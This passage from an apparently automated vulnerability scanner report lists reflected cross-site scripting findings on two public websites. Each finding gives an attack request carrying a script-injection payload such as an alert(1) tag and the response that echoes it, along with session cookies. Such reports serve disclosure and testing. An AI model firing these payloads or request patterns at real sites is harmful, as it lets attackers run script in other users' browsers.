Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569646617; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 23 Apr 2011 14:40:56 GMT
Content-Length: 22221


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/BeHealthy?d26e8"><script>alert(1)</script>f6b006dd9db=1&fbshare=true&t=Look+what+I+discovered+on+Bing"
target="_blank">
...[SNIP]...

2.48. http://www.discoverbing.com/Activities/BePrepared [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.discoverbing.com
Path:   /Activities/BePrepared

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 30806"><script>alert(1)</script>02794a1d94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Activities/BePrepared?30806"><script>alert(1)</script>02794a1d94=1 HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569649149; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 23 Apr 2011 14:40:56 GMT
Content-Length: 21973


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/BePrepared?30806"><script>alert(1)</script>02794a1d94=1&fbshare=true&t=Look+what+I+discovered+on+Bing"
target="_blank">
...[SNIP]...

2.49. http://www.discoverbing.com/Activities/FindFlights [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.discoverbing.com
Path:   /Activities/FindFlights

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d0db"><script>alert(1)</script>68fb85687a8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Activities/FindFlights?3d0db"><script>alert(1)</script>68fb85687a8=1 HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569642930; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 23 Apr 2011 14:40:51 GMT
Content-Length: 21962


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/FindFlights?3d0db"><script>alert(1)</script>68fb85687a8=1&fbshare=true&t=Look+what+I+discovered+on+Bing"
target="_blank">
...[SNIP]...

2.50. http://www.discoverbing.com/Activities/MakeLocalPlans [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.discoverbing.com
Path:   /Activities/MakeLocalPlans

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e0f1f"><script>alert(1)</script>2357e1c84b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Activities/MakeLocalPlans?e0f1f"><script>alert(1)</script>2357e1c84b7=1 HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vnum=1306159250097%26vn%3D1; ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; 081c924b-ddfd-447a-8c7a-2db01211cae7=%7B%22parent_id%22%3A%22%22%2C%22referrer%22%3A%22%22%2C%22id%22%3A%220J2F1ltJ97i%22%2C%22wom%22%3Afalse%2C%22entry_point%22%3A%22http%3A%2F%2Fwww.discoverbing.com%2Fmobile%2Findex.html%22%2C%22url_tag%22%3A%22NOMTAG%22%7D; s_cc=true; s_invisit=true; s_nr=1303569651293; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 23 Apr 2011 14:40:58 GMT
Content-Length: 22569


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/MakeLocalPlans?e0f1f"><script>alert(1)</script>2357e1c84b7=1&fbshare=true&t=Look+what+I+discovered+on+Bing"
target="_blank">
...[SNIP]...

2.51. http://www.discoverbing.com/Activities/SocialSearch [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.discoverbing.com
Path:   /Activities/SocialSearch

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b7223"><script>alert(1)</script>485a36705a7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Activities/SocialSearch?b7223"><script>alert(1)</script>485a36705a7=1 HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=kfzmxyjkhtjy3y45scdfvo45; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 23 Apr 2011 14:00:48 GMT
Content-Length: 21978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/SocialSearch?b7223"><script>alert(1)</script>485a36705a7=1&fbshare=true&t=Look+what+I+discovered+on+Bing"
target="_blank">
...[SNIP]...

2.52. http://www.discoverbing.com/facebook [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.discoverbing.com
Path:   /facebook

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84344"><script>alert(1)</script>8123e66d22e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /facebook?84344"><script>alert(1)</script>8123e66d22e=1 HTTP/1.1
Host: www.discoverbing.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/7.0
Set-Cookie: ASP.NET_SessionId=qf0g0pi5nac2fyresp0selyq; path=/; HttpOnly
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sat, 23 Apr 2011 14:00:53 GMT
Content-Length: 21978


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
...[SNIP]...
<a id="global-nav-share-facebookshare" href="http://www.facebook.com/sharer.php?u=http://www.discoverbing.com/Activities/SocialSearch?84344"><script>alert(1)</script>8123e66d22e=1&fbshare=true&t=Look+what+I+discovered+on+Bing"
target="_blank">
...[SNIP]...

2.53. http://www.informationweek.com/checkauth [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /checkauth

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9dfae"-alert(1)-"ff46e1e7966 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /9dfae"-alert(1)-"ff46e1e7966?_=1303613718975&redirectTo=http%3A%2F%2Fwww.informationweek.com%2Fnews%2Fsecurity%2Fattacks%2F229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:15:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Set-Cookie: PHPSESSID=mj1b0h6oab5g9o9s8b0s9u6720; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:15:27 GMT
Content-Type: text/html
Content-Length: 32349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--
s.pageName="";
s.server="";
s.channel="informationweek.com/9dfae"-alert(1)-"ff46e1e7966";
s.pageType="errorPage";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="173.193.214.243 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534
...[SNIP]...

2.54. http://www.informationweek.com/checkauth [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /checkauth

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 613bc"><script>alert(1)</script>5ef418a1482 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /613bc"><script>alert(1)</script>5ef418a1482?_=1303613718975&redirectTo=http%3A%2F%2Fwww.informationweek.com%2Fnews%2Fsecurity%2Fattacks%2F229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:15:25 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Set-Cookie: PHPSESSID=k61bfrk388iuei3lalfnl5qi31; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:15:25 GMT
Content-Type: text/html
Content-Length: 32525

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/613bc"><script>alert(1)</script>5ef418a1482;kvarticleid=;kauthor=;loc=300;grp=931294887;" target="_blank">
...[SNIP]...

2.55. http://www.informationweek.com/comment/captcha [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /comment/captcha

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5818f"><script>alert(1)</script>904650c8cb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comment5818f"><script>alert(1)</script>904650c8cb7/captcha HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r53i3a4pci5b1m403nc5srhq54; s_cc=true; s_nr=1303613720292; s_lv=1303613720293; s_lv_s=First%20Visit; us_ubm_aut=3-1; s_sq=%5B%5BB%5D%5D; iwkbtn_dell_110423b=5654655173|1303613724356; _bizo_cksm_crc32=3AF13A5B; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=EF8AB71782641063

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:19:26 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:19:26 GMT
Content-Type: text/html
Content-Length: 32712

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/comment5818f"><script>alert(1)</script>904650c8cb7/captcha;kvarticleid=;kauthor=;loc=300;grp=224823371;" target="_blank">
...[SNIP]...

2.56. http://www.informationweek.com/comment/captcha [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /comment/captcha

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12d21"-alert(1)-"821c5415bb9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comment12d21"-alert(1)-"821c5415bb9/captcha HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r53i3a4pci5b1m403nc5srhq54; s_cc=true; s_nr=1303613720292; s_lv=1303613720293; s_lv_s=First%20Visit; us_ubm_aut=3-1; s_sq=%5B%5BB%5D%5D; iwkbtn_dell_110423b=5654655173|1303613724356; _bizo_cksm_crc32=3AF13A5B; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=EF8AB71782641063

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:19:27 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:19:27 GMT
Content-Type: text/html
Content-Length: 32536

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<!--
s.pageName="";
s.server="";
s.channel="informationweek.com/comment12d21"-alert(1)-"821c5415bb9";
s.pageType="errorPage";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop6="";
s.prop7="";
s.prop8="173.193.214.243 | Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534
...[SNIP]...

2.57. http://www.informationweek.com/comment/captcha [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /comment/captcha

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fccb4'-alert(1)-'124152fd938 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /comment/captchafccb4'-alert(1)-'124152fd938 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r53i3a4pci5b1m403nc5srhq54; s_cc=true; s_nr=1303613720292; s_lv=1303613720293; s_lv_s=First%20Visit; us_ubm_aut=3-1; s_sq=%5B%5BB%5D%5D; iwkbtn_dell_110423b=5654655173|1303613724356; _bizo_cksm_crc32=3AF13A5B; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=EF8AB71782641063

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:19:32 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:19:32 GMT
Content-Type: text/html
Content-Length: 32508

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<scr'+'ipt language="javascript1.1" charset="utf-8" src="http://adserver.adtechus.com/addyn/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/comment/captchafccb4'-alert(1)-'124152fd938;kvarticleid=;kauthor=;loc=100;target=_blank;grp=430412983;misc='+new Date().getTime()+'">
...[SNIP]...

2.58. http://www.informationweek.com/comment/captcha [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /comment/captcha

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcefe"><script>alert(1)</script>fe5ee48cf1c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comment/captchafcefe"><script>alert(1)</script>fe5ee48cf1c HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/json, text/javascript, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r53i3a4pci5b1m403nc5srhq54; s_cc=true; s_nr=1303613720292; s_lv=1303613720293; s_lv_s=First%20Visit; us_ubm_aut=3-1; s_sq=%5B%5BB%5D%5D; iwkbtn_dell_110423b=5654655173|1303613724356; _bizo_cksm_crc32=3AF13A5B; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=EF8AB71782641063

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:19:30 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:19:31 GMT
Content-Type: text/html
Content-Length: 32688

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>
...[SNIP]...
<a href="http://adserver.adtechus.com/adlink/3.0/5242.1/1199874/0/16/ADTECH;alias=;key=/comment/captchafcefe"><script>alert(1)</script>fe5ee48cf1c;kvarticleid=;kauthor=;loc=300;grp=190506711;" target="_blank">
...[SNIP]...

2.59. http://www.informationweek.com/index/welcome [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.informationweek.com
Path:   /index/welcome

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5608"-alert(1)-"9829f497abd840a41 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /indexb5608"-alert(1)-"9829f497abd840a41/welcome?redirectTo=http%3A%2F%2Fwww.informationweek.com%2Fnews%2Fsecurity%2Fattacks%2F229402094 HTTP/1.1
Host: www.informationweek.com
Proxy-Connection: keep-alive
Referer: http://www.informationweek.com/news/security/attacks/229402094
Origin: http://www.informationweek.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=r53i3a4pci5b1m403nc5srhq54; s_cc=true; s_nr=1303613720292; s_lv=1303613720293; s_lv_s=First%20Visit; us_ubm_aut=3-1; s_sq=%5B%5BB%5D%5D; iwkbtn_dell_110423b=5654655173|1303613724356

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 03:17:21 GMT
Server: Apache
X-Powered-By: PHP/5.3.5 ZendServer/5.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified: Sun, 24 Apr 2011 03:17:21 GMT
Content-Type: text/html
Content-Length: 32588

